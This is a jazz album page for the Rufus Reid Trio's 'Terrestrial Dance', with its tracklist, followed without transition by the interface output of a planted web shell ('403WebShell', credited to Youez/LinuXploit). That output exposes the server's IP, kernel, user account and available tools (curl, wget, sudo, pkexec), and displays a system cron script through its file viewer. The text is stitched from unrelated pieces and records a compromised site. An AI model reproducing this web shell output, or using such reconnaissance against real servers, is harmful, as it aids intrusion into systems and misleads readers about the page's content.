Rufus Reid Trio with Steve Allee and Duduka Da Fonseca, featuring the Sirius Quartet
Terrestrial Dance
Newvelle Records (2017)
Available at the following outlets:
Tracklist
This I Ask of You
Its Time to Shout It Out
Tippin’
Tranescape
Celestial Dance
You Make Me Smile
Falling In Love
Cedar’s Blues
403WebShell 403Webshell
Server IP : 23.235.221.107 / Your IP : 216.73.216.166 Web Server : Apache System : Linux drums.jazzcorner.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64 User : rreid ( 1011 ) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : / bin / Upload File :
[ Back ] Current File : /bin/libcare-cron #!/usr/bin/bash
# vi:syntax=sh
set -eo pipefail
progname=$(basename "$0")
sub_help(){
echo "Usage: $progname <subcommand> [options]"
echo ""
echo "Subcommands:"
echo " init"
echo " disable"
echo ""
echo "For help with each subcommand run:"
echo "$progname <subcommand> -h|--help"
echo ""
}
LIBCARE_CRONFILE=/etc/cron.d/libcare-cron
subcommand=$1
sub_disable(){
if [[ -e ${LIBCARE_CRONFILE} && -s ${LIBCARE_CRONFILE} ]]; then
rm ${LIBCARE_CRONFILE}
fi
}
sub_init(){
if ! [[ -e ${LIBCARE_CRONFILE} && -s ${LIBCARE_CRONFILE} ]]; then
echo "$(( RANDOM % 60 )) */4 * * * root /usr/bin/kcarectl -q --lib-auto-update" > ${LIBCARE_CRONFILE}
fi
}
case $subcommand in
"" | "-h" | "--help")
sub_help
;;
*)
shift
"sub_${subcommand}" "$@"
if [ $? = 127 ]; then
echo "Error: '$subcommand' is not a known subcommand." >&2
echo " Run '$progname --help' for a list of known subcommands." >&2
exit 1
fi
;;
esac
echo "Done."
Youez - 2016 - github.com/yon3zuLinuXploit